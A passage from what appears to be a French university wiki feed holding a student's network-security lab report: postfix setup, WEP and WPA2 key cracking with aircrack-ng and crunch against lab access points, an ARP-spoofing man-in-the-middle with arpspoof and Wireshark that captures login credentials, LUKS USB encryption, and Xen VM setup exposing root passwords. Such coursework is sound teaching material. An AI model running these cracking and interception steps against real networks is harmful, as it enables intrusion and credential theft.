On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'&lt;br /&gt;
 service postfix restart&lt;br /&gt;
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande &amp;lt;code&amp;gt;dpkg-reconfigure postfix&amp;lt;/code&amp;gt;&lt;br /&gt;
====Réception d'un message====&lt;br /&gt;
On peux testé la reception de message en envoyant un message a 'roor@glopglop.site'&lt;br /&gt;
Si tout fonctionne bien, on peux visualisé les méssage recu en tappant la commande &amp;lt;code&amp;gt;mutt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On constate que on resoit bien les message en provenance du mail de Polytech.&lt;br /&gt;
Pour que gandi puissent nous envoyer le mail contenant la clef de cryptage, on a besoint de pouvoir recevoirr les messages qui sont destiné a 'admin@glopglop.site'&lt;br /&gt;
&lt;br /&gt;
Pour cela on va modifier le fichier 'vim /etc/aliases' en ajoutant la commande &amp;lt;code&amp;gt;admin:root&amp;lt;/code&amp;gt;&lt;br /&gt;
On crée ensuite un &amp;lt;code&amp;gt;newaliases&amp;lt;/code&amp;gt; puis on restarte bind9 avec la commance &amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Attention pour les test il est conseiller d'utilisé deux boite mail différante care celle ci prenne du temps pour se mettre a jours.&lt;br /&gt;
&lt;br /&gt;
====Envoie du SSL Certification Gandi====&lt;br /&gt;
&lt;br /&gt;
Quand on est sure que le mail fonctionne bien avec l'envoie d'un message a destination de 'admin@glopglop.site' on peux demandé a gandi de bous envoyer la clef de cryptage.&lt;br /&gt;
On demande d'envoyet le ssl certification a notre VM, cela peux prendre un certain temps.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:SSL_Certification_Gandi_Mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Description ===&lt;br /&gt;
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA &lt;br /&gt;
&lt;br /&gt;
=== Installation de la clef Wifi ===&lt;br /&gt;
Avec la commande &amp;lt;code&amp;gt;lsusb&amp;lt;/code&amp;gt; on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.&lt;br /&gt;
&lt;br /&gt;
 Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter&lt;br /&gt;
 Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub&lt;br /&gt;
 Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard&lt;br /&gt;
 Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse&lt;br /&gt;
 Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
&lt;br /&gt;
La clef ubs Wifi est bien détécter.&lt;br /&gt;
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :&lt;br /&gt;
 apt-get install firmware-ralink&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande &amp;lt;code&amp;gt;ip l&amp;lt;/code&amp;gt; et on récupère le résultat ci-dessous : &lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 5: bridge: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 6: vmnet1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 7: vmnet8: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 8: wlx40a5ef059784: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
&lt;br /&gt;
La clef wifi s'apelle donc &amp;lt;code&amp;gt;wlx40a5ef059784&amp;lt;/code&amp;gt; on fait maintenant un &amp;lt;code&amp;gt; ip link set wlx40a5ef059784 up&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec la comande &amp;lt;code&amp;gt;dmsg&amp;lt;/code&amp;gt; on vérifie que la clef wifi fonctionne bien. &lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
 &lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de &amp;lt;code&amp;gt;airmon-ng&amp;lt;/code&amp;gt; qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
 airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
 airmon-ng start wlx40a5ef059784&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On obtien le résultat ci dessous :                                   &lt;br /&gt;
                                                                                                                &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                 &lt;br /&gt;
 38:0E:4D:B0:E9:E0   -1        0        1    0   1  -1   WPA              &amp;lt;length:  0&amp;gt;                          &lt;br /&gt;
 04:DA:D2:9C:50:51  -30       49      834    0   9  54e. WEP  WEP         cracotte02                            &lt;br /&gt;
 04:DA:D2:9C:50:5A  -29       44      841    0   9  54e. WEP  WEP         cracotte11                            &lt;br /&gt;
 04:DA:D2:9C:50:56  -28       53      832    9   9  54e. WEP  WEP         cracotte07                            &lt;br /&gt;
 04:DA:D2:9C:50:57  -29       54      803    0   9  54e. WEP  WEP         cracotte08                            &lt;br /&gt;
 04:DA:D2:9C:50:59  -30       50      833    0   9  54e. WEP  WEP         cracotte10                            &lt;br /&gt;
 04:DA:D2:9C:50:54  -29       48      841    0   9  54e. WEP  WEP         cracotte05                            &lt;br /&gt;
 04:DA:D2:9C:50:50  -29       50      841    0   9  54e. WEP  WEP         cracotte01                            &lt;br /&gt;
 04:DA:D2:9C:50:5B  -29       50      825    0   9  54e. WEP  WEP         cracotte12                            &lt;br /&gt;
 04:DA:D2:9C:50:53  -33       46      843    0   9  54e. WEP  WEP         cracotte04                            &lt;br /&gt;
 04:DA:D2:9C:50:58  -28       50      694    0   9  54e. WEP  WEP         cracotte09                            &lt;br /&gt;
 04:DA:D2:9C:50:55  -30       49      746    0   9  54e. WEP  WEP         cracotte06                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -33       50      764    0   9  54e. WEP  WEP         cracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:28  -30       60        0    0   4  54e. WPA2 CCMP   PSK  kracotte09                            &lt;br /&gt;
 00:14:1B:60:8C:22  -31       55        0    0   4  54e. WPA2 CCMP   PSK  kracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:27  -32       64        0    0   4  54e. WPA2 CCMP   PSK  kracotte08                            &lt;br /&gt;
 00:14:1B:60:8C:24  -34       58        0    0   4  54e. WPA2 CCMP   PSK  kracotte05                            &lt;br /&gt;
 00:14:1B:60:8C:23  -31       63        0    0   4  54e. WPA2 CCMP   PSK  kracotte04&lt;br /&gt;
&lt;br /&gt;
Le réseau que nous voulons craquer est &amp;lt;code&amp;gt;cracotte05 ssid : 04:DA:D2:9C:50:54  chanel : 9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On utilise la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon&amp;lt;/code&amp;gt;. cela nous crée un &amp;lt;code&amp;gt;reseau_cracotte05-01.cap&amp;lt;/code&amp;gt; On n'as pluq qu'a faire un &amp;lt;code&amp;gt;aircrack-ng reseau_cracotte05-01.cap &amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
 KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056) &lt;br /&gt;
    1    0/  1   DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544) &lt;br /&gt;
    2    1/  3   D4(47360) 98(46336) B6(45568) A7(45056) EB(45056) &lt;br /&gt;
    3    0/  2   00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544) &lt;br /&gt;
    4    0/  1   00(50688) 09(45824) 50(45568) FD(45056) 5E(44032) &lt;br /&gt;
    5    0/  3   00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056) &lt;br /&gt;
    6    0/  1   00(51456) 09(47104) 3A(45824) F9(45824) 04(45568) &lt;br /&gt;
    7    0/  1   00(51712) C9(47360) 08(46336) 56(45312) E2(44800) &lt;br /&gt;
    8    0/  1   00(54016) 05(45568) C1(45312) D5(44544) B7(44288) &lt;br /&gt;
    9    0/  2   00(47872) 56(46592) 84(45568) 88(45568) F2(45056) &lt;br /&gt;
   10    1/  2   09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568) &lt;br /&gt;
   11    0/  2   99(48128) 76(47616) 99(46080) E6(46080) 06(44800) &lt;br /&gt;
   12    2/  4   FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776) &lt;br /&gt;
&lt;br /&gt;
   KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ] &lt;br /&gt;
   Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
Et voila nous avons trouver clef du réseau wifi cracotte05&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSA ===&lt;br /&gt;
&lt;br /&gt;
On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.&lt;br /&gt;
On va donc faire un &amp;quot;cassage par force brute&amp;quot; avec un fichier texte contenant tout les combination de 00000000 a 99999999.&lt;br /&gt;
&lt;br /&gt;
On commence par installer Crnch avec la commande &amp;lt;code&amp;gt;sudo apt-get install -y crunch&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois installer on génère un fichier dictionnaite.txt avec la commande &amp;lt;code&amp;gt;crunch 8 8 0123456789 &amp;gt;&amp;gt; dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
On relance la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24&amp;lt;/code&amp;gt;&lt;br /&gt;
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons aircrack-ng avec la commande &amp;lt;code&amp;gt;aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Read 121032 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
 &lt;br /&gt;
   1  00:14:1B:60:8C:24  kracotte05                No data - WEP or WPA&lt;br /&gt;
 &lt;br /&gt;
   Choosing first network as target.&lt;br /&gt;
 &lt;br /&gt;
   Opening reseau_kracotte05-01.cap&lt;br /&gt;
   Read 121032 packets.&lt;br /&gt;
 &lt;br /&gt;
   1 potential targets&lt;br /&gt;
   Got no data packets from target network!&lt;br /&gt;
   Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.&lt;br /&gt;
Une fois que on a récupérer les data, on peux effectuer le &amp;quot;cassage par force brute&amp;quot; &lt;br /&gt;
&lt;br /&gt;
  Aircrack-ng 1.5.2 &lt;br /&gt;
 &lt;br /&gt;
      [00:32:18] 10323450/102795810 keys tested (2771.75 k/s) &lt;br /&gt;
 &lt;br /&gt;
      Time left: 9 hours, 16 minutes, 11 seconds                10.04%&lt;br /&gt;
 &lt;br /&gt;
                           KEY FOUND! [ 10244444 ]&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
      Master Key     : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B &lt;br /&gt;
                       46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B &lt;br /&gt;
 &lt;br /&gt;
      Transient Key  : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8 &lt;br /&gt;
                       54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B &lt;br /&gt;
                       9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70 &lt;br /&gt;
                       79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85 &lt;br /&gt;
 &lt;br /&gt;
      EAPOL HMAC     : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD&lt;br /&gt;
&lt;br /&gt;
On a bien trouver la clé du wifi !&lt;br /&gt;
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. Cela permet de diviser le temps de traitement par le nombre de machine utilisé.&lt;br /&gt;
&lt;br /&gt;
===Exploitation de failles du système===&lt;br /&gt;
&lt;br /&gt;
===Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP===&lt;br /&gt;
Maintenant on tesnt une attaque par &amp;quot;homme au milieu&amp;quot; pour commancé, on va installer le paquetage &amp;lt;code&amp;gt;dsniff&amp;lt;/code&amp;gt; pour cela on utilise la commande : &amp;lt;code&amp;gt;apt-get install dsniff&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/conf/all/rp_filter&amp;lt;/code&amp;gt; la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.&lt;br /&gt;
&lt;br /&gt;
Ensuite on fait un &amp;lt;code&amp;gt;ip r&amp;lt;/code&amp;gt; pour récupérer l'adresse ip du routeur.&lt;br /&gt;
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;arpspoof -i bridge -t zabeth07 172.26.145.254&amp;lt;/code&amp;gt;&lt;br /&gt;
On lance Wireshark en root en utilisant la commande &amp;lt;code&amp;gt;su&amp;lt;/code&amp;gt; si celui ci n'est pas installer on fait préalablement &amp;lt;code&amp;gt;apt-get install wireshark&amp;lt;/code&amp;gt;&lt;br /&gt;
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.&lt;br /&gt;
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.&lt;br /&gt;
 Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
 Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web===&lt;br /&gt;
&lt;br /&gt;
==Réalisations==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'&lt;br /&gt;
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.&lt;br /&gt;
 apt-get install cryptsetup&lt;br /&gt;
 apt-get install lvm2 &lt;br /&gt;
&lt;br /&gt;
Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.&lt;br /&gt;
&lt;br /&gt;
Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande &amp;lt;code&amp;gt;mkfs.vfat -n 'Alex.G' -I /dev/sdb1&amp;lt;/code&amp;gt; on obtien le nom de la clef USB avec la commande &amp;lt;code&amp;gt;df -h&amp;lt;/code&amp;gt;&lt;br /&gt;
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.&lt;br /&gt;
&lt;br /&gt;
On peut lancer le cryptage de la clef USB avec la commande &amp;lt;code&amp;gt;cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb&amp;lt;/code&amp;gt; Pour savoir ou les la clef USB on utilise la commande &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;&lt;br /&gt;
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.&lt;br /&gt;
La liste des commande utilisé est listé ci-dessous : &lt;br /&gt;
 mount /dev/mapper/Alex.G /mnt&lt;br /&gt;
 cp -r /etc /mnt&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose Alex.G&lt;br /&gt;
&lt;br /&gt;
On peut voir que le clef USB crypter fonctionne bien.&lt;br /&gt;
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=53937</id>
		<title>TP sysres IMA2a5 2020/2021 G5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=53937"/>
				<updated>2020-11-20T08:54:30Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* Envoie du SSL Certification Gandi */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.&lt;br /&gt;
&lt;br /&gt;
=== Tableau Récapitulatif ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Vlan7&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|193.48.57.168&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de de la VM &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|mirage&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth06&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTP&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTPS&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation == &lt;br /&gt;
&lt;br /&gt;
Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.&lt;br /&gt;
Pour cela, il faut utiliser la commande : &lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :&lt;br /&gt;
  xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a &amp;quot;capbreton&amp;quot; puis on utilise la commande : &lt;br /&gt;
 tail -f /var/log/xen-tools/mirage.0.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation, on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
     ---------------------&lt;br /&gt;
     Hostname        :  mirage&lt;br /&gt;
     Distribution    :  ascii&lt;br /&gt;
     MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
     IP Address(es)  :  dynamic&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
     Root Password   :  DgtUlOmnBFERdfarGBsopGR&lt;br /&gt;
&lt;br /&gt;
Une fois la VM créer, nous pouvons la lancer avec la commande :&lt;br /&gt;
 xl create /etc/xen/mirage.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que le VM est bien démarrer avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
Pour fonctionner l'état de la VM doit être r ou -b&lt;br /&gt;
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On accède pour la premier fois a nottre Vm avec la commande :&lt;br /&gt;
 xl console mirage&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). &lt;br /&gt;
Après nous être logué, on change le mot de passe qui devient : glopglopglop.&lt;br /&gt;
&lt;br /&gt;
=== Configuration de la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant installer les packages que nous avons besoins : &lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get install VIM&lt;br /&gt;
&lt;br /&gt;
Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :&lt;br /&gt;
 vim /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Dans interfaces on tajoute &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.168&lt;br /&gt;
 gateway 193.58.57.163&lt;br /&gt;
 netmask 255.255.255.248&lt;br /&gt;
&lt;br /&gt;
Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :&lt;br /&gt;
 vi /etc/ssh/ssh_config&lt;br /&gt;
 &lt;br /&gt;
Le fichier ssh_config doit être configurer comme ci dessous :&lt;br /&gt;
 Host *&lt;br /&gt;
 SendEnv LANH LC_*&lt;br /&gt;
 HashKnownHOST yes&lt;br /&gt;
 GSSAPIAuthentification yes&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton, une paserell doit être mis en place pour pouvoir connecté les VM aux monde extérieure.&lt;br /&gt;
Pour cela on configure ces interfacte avec la commande : &lt;br /&gt;
 vim/etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Puis on configure la passerelle comem ci dessous : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
  auto lo&lt;br /&gt;
  iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
  # Physical Network Interfaces&lt;br /&gt;
  #&lt;br /&gt;
 auto eth&lt;br /&gt;
  iface eth inet static&lt;br /&gt;
    address 192.168.0.29&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
    gateway 192.168.0.1&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
  iface eth0 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth1&lt;br /&gt;
  iface eth1 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth2&lt;br /&gt;
 iface eth2 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth4&lt;br /&gt;
 iface eth4 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth5&lt;br /&gt;
 iface eth5 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth6&lt;br /&gt;
 iface eth6 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth7&lt;br /&gt;
 iface eth7 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Main trunk bridge&lt;br /&gt;
 #&lt;br /&gt;
